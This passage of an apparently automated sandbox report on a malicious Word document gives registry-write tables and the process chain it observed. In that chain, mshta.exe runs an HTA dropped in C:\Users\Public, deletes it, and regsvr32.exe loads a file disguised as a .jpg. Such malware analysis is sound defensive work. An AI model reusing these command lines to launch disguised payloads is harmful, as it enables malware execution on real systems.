Source Key Path Name Type Data Completion Count Address Symbol HKEY_LOCAL_MACHINE\SOFTWARE\Mi VBAFilesIntl_1033 dword 1386086401 success or wait 1 66B27FEE unknown crosoft\Windows\CurrentVersion \Installer\UserData\S-1-5-18\P roducts\00006109E6009040000000 0000F01FEC\Usage HKEY_LOCAL_MACHINE\SOFTWARE\WO Name unicode Recover Text from Any File success or wait 1 66AB5805 unknown W6432Node\Microsoft\Office\16.0\Word\Text Converters\Import HKEY_LOCAL_MACHINE\SOFTWARE\WO Path unicode C:\Program Files (x86)\Common success or wait 1 66AB5805 unknown W6432Node\Microsoft\Office\16.0\Word\Text Files\Microsoft Shared\TextCon Converters\Import v\RECOVR32.CNV HKEY_LOCAL_MACHINE\SOFTWARE\WO Extensions unicode * success or wait 1 66AB5805 unknown W6432Node\Microsoft\Office\16.0\Word\Text Converters\Import HKEY_CURRENT_USER\Software\Mic Cambria Math binary 02 04 05 03 05 04 06 03 02 04 success or wait 1 66AB5805 unknown rosoft\Shared Tools\Panose HKEY_CURRENT_USER\Software\Mic 1FF7A binary 04 00 00 00 E4 17 00 00 2A 00 00 00 success or wait 1 66AB5805 unknown rosoft\Office\16.0\Word\Resili 43 00 3A 00 5C 00 55 00 73 00 65 00 ency\DocumentRecovery\1FF7A 72 00 73 00 5C 00 68 00 61 00 72 00 64 00 7A 00 5C 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5C 00 4C 00 6F 00 63 00 61 00 6C 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 69 00 6D 00 67 00 73 00 2E 00 68 00 74 00 6D 00 08 00 00 00 69 00 6D 00 67 00 73 00 2E 00 68 00 74 00 6D 00 00 00 00 00 01 00 00 00 00 00 00 00 97 4E 1D 10 1E 3E D7 01 7A FF 01 00 7A FF 01 00 00 00 00 00 DB 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Copyright Joe Security LLC 2021 Page 42 of 49 00 00 00 00 00 00 00 00 00 00 00 00 Source Key Path Name Type D00a t0a0 00 00 00 00 00 00 00 00 00 00 Completion Count Address Symbol 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 HKEY_CURRENT_USER\Software\Mic File Path unicode C:\Users\user\AppData\Local\Te success or wait 1 66AB5805 unknown rosoft\Office\16.0\Word\Reading mp\imgs.htm Locations\Document 0 HKEY_CURRENT_USER\Software\Mic Datetime unicode 2021-04-30T17:08 success or wait 1 66AB5805 unknown rosoft\Office\16.0\Word\Reading Locations\Document 0 HKEY_CURRENT_USER\Software\Mic Position unicode 0 0 success or wait 1 66AB5805 unknown rosoft\Office\16.0\Word\Reading Locations\Document 0 HKEY_CURRENT_USER\Software\Mic MainWindow unicode 0 0 1280 984 1 success or wait 1 66B798E7 RegSetValueExA rosoft\VBA\7.1\Common HKEY_CURRENT_USER\Software\Mic MdiMaximized unicode 0 success or wait 1 66B798E7 RegSetValueExA rosoft\VBA\7.1\Common

Copyright Joe Security LLC 2021 Page 43 of 49 Source Key Path Name Type Data Completion Count Address Symbol HKEY_CURRENT_USER\Software\Mic Dock binary 02 00 4C 01 05 00 08 00 04 00 1E 00 success or wait 1 66B24713 RegSetValueExA rosoft\VBA\7.1\Common FC 03 FC 02 FF 02 01 01 04 00 1E 00 B8 00 FC 02 FF 02 00 01 04 00 1E 00 B8 00 2F 01 05 00 00 01 04 00 35 01 B8 00 FC 02 01 00 00 01 BE 00 1E 00 FC 03 FC 02 FF 02 00 01 BE 00 1E 00 FC 03 FC 02 FF 02 01 01 BE 00 1E 00 FC 03 FC 02 00 00 00 01 BB 03 5E 00 FC 03 FC 02 06 00 00 00 D3 00 AF 01 09 03 32 02 FF 03 01 00 D3 00 AF 01 09 03 32 02 04 00 00 00 93 01 AF 01 09 03 32 02 03 00 00 00 D3 00 AF 01 09 03 32 02 02 00 00 00 21 00 72 01 6C 02 12 02 FF 03 01 00 21 00 72 01 E8 00 12 02 04 00 00 00 EE 00 72 01 A9 01 12 02 03 00 00 00 AF 01 72 01 6C 02 12 02 02 00 00 00 F8 02 81 00 AC 03 01 01 05 00 00 00 59 00 30 02 0D 01 4B 03 01 00 00 00 3A 03 BC 00 79 03 1F 02 06 00 00 00 16 00 16 00 D9 01 C4 00 04 00 01 00 2C 00 2C 00 EB 01 E3 00 03 00 01 00 42 00 42 00 3B 02 F7 00 02 00 01 00 00 00 00 00 00 00 00 00 08 00 00 00 58 00 57 00 37 01 FF 01 01 00 01 00 00 00 00 00 00 00 00 00 06 00 01 00 6E 00 6E 00 7F 01 52 01 05 00 01 00 00 00 00 00 00 00 00 00 00 00 01 00 HKEY_CURRENT_USER\Software\Mic FolderView unicode 1 success or wait 1 66B798E7 RegSetValueExA rosoft\VBA\7.1\Common HKEY_CURRENT_USER\Software\Mic Tool binary 00 00 00 00 07 00 00 00 47 65 6E 65 success or wait 1 66B79A07 RegSetValueExA rosoft\VBA\7.1\Common 72 61 6C 00 FF FF FF FF FF FF FF FF HKEY_CURRENT_USER\Software\Mic CtlsShowSelected unicode 0 success or wait 1 66B798E7 RegSetValueExA rosoft\VBA\7.1\Common HKEY_CURRENT_USER\Software\Mic DsnShowSelected unicode 0 success or wait 1 66B798E7 RegSetValueExA rosoft\VBA\7.1\Common HKEY_CURRENT_USER\Software\Mic Microsoft Visual binary 01 01 00 00 00 00 00 00 00 00 01 00 success or wait 1 66B24E8B unknown rosoft\VBA\7.1\Common\Toolbars\Settings Basic 00 00 HKEY_CURRENT_USER\Software\Mic UI binary 69 00 00 00 01 01 00 00 00 00 00 00 success or wait 1 66B24EF9 RegSetValueExA rosoft\VBA\7.1\Common 06 00 01 00 00 00 02 01 0B 00 00 80 00 00 08 01 00 01 00 00 14 00 08 4D 00 65 00 6E 00 75 00 20 00 42 00 61 00 72 00 01 01 01 00 00 00 FF FF 00 00 FD FF 32 00 32 00 58 02 5A 00 00 00 00 00 03 01 00 0A 32 75 00 00 08 00 03 01 00 00 00 00 01 80 00 00 03 01 00 0A 33 75 00 00 08 00 03 02 00 00 00 00 02 80 00 00 03 01 00 0A 34 75 00 00 08 00 03 03 00 00 00 00 03 80 00 00 03 01 00 0A 35 75 00 00 08 00 03 04 00 00 00 00 04 80 00 00 03 01 00 0A 36 75 00 00 08 00 03 05 00 00 00 00 05 80 00 00 03 01 00 0A D5 75 00 00 08 00 03 06 00 00 00 00 06 80 00 00 03 01 00 0A 3C 75 00 00 08 00 03 07 00 00 00 00 07 80 00 00 03 01 00 0A 37 75 00 00 08 00 03 08 00 00 00 00 08 80 00 00 03 01 00 0A 56 75 00 00 08 00 03 09 00 00 00 00 09 80 00 00 03 01 00 0A 39 75 00 00 08 00 03 0A 00 00 00 00 0A 80 00 00 03 01 00 0A 3A 75 00 00 08 00 03 0B 00 00 00 00 30 00 00 00 02 01 FF FF 2F 80 00 00 00 00 00 00 00 00 10 00 08 53 00 74 00 61 00 6E 00 64 00 61 00 72 00 64 00 01 01 01 01 00 00 FF FF 00 00 FD FF 32 00 6E 00 58 02 96 00 2F 00 00 00 02 01 FF FF 30 80 00 00 00 00 00 00 00 00 10 00 04 45 00 64 00 69 00 74 00 04 00 01 02 00 00 FF FF 00 00 FD FF 32 00 AA 00 58 02 D2 00 30 00 00 00 02 01 FF FF 31 80 00 00 00 00 00 00 00 00 10 00 05 44 00 65 00 62 00 75 00 67 00 04 00 01 03 00 00 FF FF 00 00 FD FF 32 00 E6 00 58 02 0E 01 31 00 00 00 02 01 FF FF 32 80 00 00 00 00 00 00 00 00 10 00 08 55 00 73 00 65 00 72 00 46 00 6F 00 72 00 6D 00 04 00 01 04 00 00 FF FF 00 00 FD FF 32 00 22 01 58 02 4A 01 32 00 00 00 02 01 FF FF DB 00 00 00 97 01 00 02 00 00 10 00 00 04 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 00 00 00

Source Key Path Name Type Old Data New Data Completion Count Address Symbol HKEY_LOCAL_MACHINE\SOFT ProductFiles dword 1386086415 1386086416 success or wait 1 66AB5805 unknown WARE\Mi crosoft\Windows\CurrentVersion \Installer\UserData\S-1-5-18\P roducts\000061091100000000000 00000F01FEC\Usage HKEY_LOCAL_MACHINE\SOFT ProductFiles dword 1386086416 1386086417 success or wait 1 66AB5805 unknown WARE\Mi crosoft\Windows\CurrentVersion \Installer\UserData\S-1-5-18\P roducts\000061091100000000000 00000F01FEC\Usage HKEY_LOCAL_MACHINE\SOFT Name unicode Recover Text from Any File WordPerfect 5.x success or wait 1 66AB5805 unknown WARE\WO W6432Node\Microsoft\Office\16. 0\Word\Text Converters\Import HKEY_LOCAL_MACHINE\SOFT Path unicode C:\Program Files (x86)\Common C:\Program Files (x86)\Common success or wait 1 66AB5805 unknown WARE\WO Files\Microsoft Shared\TextCon Files\Microsoft Shared\TextCon W6432Node\Microsoft\Office\16. v\RECOVR32.CNV v\WPFT532.CNV 0\Word\Text Converters\Import HKEY_LOCAL_MACHINE\SOFT Extensions unicode * doc success or wait 1 66AB5805 unknown WARE\WO W6432Node\Microsoft\Office\16. 0\Word\Text Converters\Import HKEY_LOCAL_MACHINE\SOFT Name unicode WordPerfect 5.x WordPerfect 6.x - 7.0 success or wait 1 66AB5805 unknown WARE\WO W6432Node\Microsoft\Office\16. 0\Word\Text Converters\Import HKEY_LOCAL_MACHINE\SOFT Path unicode C:\Program Files (x86)\Common C:\Program Files (x86)\Common success or wait 1 66AB5805 unknown WARE\WO Files\Microsoft Shared\TextCon Files\Microsoft Shared\TextCon W6432Node\Microsoft\Office\16. v\WPFT532.CNV v\WPFT632.CNV 0\Word\Text Converters\Import HKEY_LOCAL_MACHINE\SOFT Extensions unicode doc wpd doc success or wait 1 66AB5805 unknown WARE\WO W6432Node\Microsoft\Office\16. 0\Word\Text Converters\Import HKEY_CURRENT_USER\Softwar 1FF7A binary 04 00 00 00 E4 17 00 00 2A 00 04 00 00 00 E4 17 00 00 2A 00 success or wait 1 66AB5805 unknown e\Mic 00 00 43 00 3A 00 5C 00 55 00 00 00 43 00 3A 00 5C 00 55 00 rosoft\Office\16.0\Word\Resili 73 00 65 00 72 00 73 00 5C 00 73 00 65 00 72 00 73 00 5C 00 ency\DocumentRecovery\1FF7A 68 00 61 00 72 00 64 00 7A 00 68 00 61 00 72 00 64 00 7A 00 5C 00 41 00 70 00 70 00 44 00 5C 00 41 00 70 00 70 00 44 00 61 00 74 00 61 00 5C 00 4C 00 61 00 74 00 61 00 5C 00 4C 00 6F 00 63 00 61 00 6C 00 5C 00 6F 00 63 00 61 00 6C 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 69 00 6D 00 67 00 73 00 2E 00 69 00 6D 00 67 00 73 00 2E 00 68 00 74 00 6D 00 08 00 00 00 68 00 74 00 6D 00 08 00 00 00 69 00 6D 00 67 00 73 00 2E 00 69 00 6D 00 67 00 73 00 2E 00 68 00 74 00 6D 00 00 00 00 00 68 00 74 00 6D 00 00 00 00 00 01 00 00 00 00 00 00 00 97 4E 01 00 00 00 00 00 00 00 00 00 1D 10 1E 3E D7 01 7A FF 01 00 00 00 00 00 00 00 7A FF 01 00 7A FF 01 00 00 00 00 00 DB 04 7A FF 01 00 00 00 00 00 DB 04 00 00 02 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Copyright Joe Security LLC 2021 Page 45 of 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Source Key Path Name Type O00ld 0 D0 a0t0a 00 00 00 00 00 00 00 N00e w00 D 0a0t a00 00 00 00 00 00 00 Completion Count Address Symbol 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Copyright Joe Security LLC 2021 Page 46 of 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Source Key Path Name Type O00ld 0 D0 a0t0a 00 00 00 00 00 00 00 N00e w00 D 0a0t a00 00 00 00 00 00 00 Completion Count Address Symbol 00 FF FF FF FF 00 00 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00

Analysis Process: explorer.exe PID: 6048 Parent PID: 6116

General

Start time: 17:07:37 Start date: 30/04/2021 Path: C:\Windows\SysWOW64\explorer.exe Wow64 process (32bit): true Commandline: explorer c:\users\public\valuePasteList.hta Imagebase: 0x1320000 File size: 3611360 bytes MD5 hash: 166AB1B9462E5C1D6D18EC5EC0B6A5F7 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

File Created

Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user\AppData\Local\Microsoft\Windows\Caches read data or list device directory file | object name collision 1 145000F ILCreateFromPathW directory | synchronous io synchronize non alert | open for backup ident | open reparse point

Source File Path Offset Length Completion Count Address Symbol

Analysis Process: explorer.exe PID: 5316 Parent PID: 792

General

Start time: 17:07:38 Start date: 30/04/2021 Path: C:\Windows\explorer.exe Wow64 process (32bit): false Commandline: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding Imagebase: 0x7ff714890000 File size: 3933184 bytes MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Registry Activities

Source Key Path Completion Count Address Symbol

Source Key Path Name Type Data Completion Count Address Symbol

Copyright Joe Security LLC 2021 Page 47 of 49 Source Key Path Name Type Old Data New Data Completion Count Address Symbol Source

Analysis Process: mshta.exe PID: 4804 Parent PID: 5316

General

Start time: 17:07:39 Start date: 30/04/2021 Path: C:\Windows\SysWOW64\mshta.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\valuePasteList.hta' {1E460BD7-F1C3- 4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} Imagebase: 0x1270000 File size: 13312 bytes MD5 hash: 7083239CE743FDB68DFC933B7308E80A Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

File Deleted

Source File Path Completion Count Address Symbol C:\Users\Public\valuePasteList.hta success or wait 1 7099A8A4 DeleteFileW

Source File Path Offset Length Value Ascii Completion Count Address Symbol

Source File Path Offset Length Completion Count Address Symbol

Registry Activities

Source Key Path Completion Count Address Symbol

Source Key Path Name Type Data Completion Count Address Symbol

Analysis Process: regsvr32.exe PID: 4864 Parent PID: 4804

General

Start time: 17:07:42 Start date: 30/04/2021 Path: C:\Windows\SysWOW64\regsvr32.exe Wow64 process (32bit): true Commandline: 'C:\Windows\System32\regsvr32.exe' c:\users\public\valuePasteList.jpg Imagebase: 0x990000 File size: 20992 bytes MD5 hash: 426E7499F6A7346F0410DEAD0805586B Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Read

Source File Path Offset Length Completion Count Address Symbol C:\Users\Public\valuePasteList.jpg unknown 64 success or wait 1 991909 ReadFile

Disassembly

Code Analysis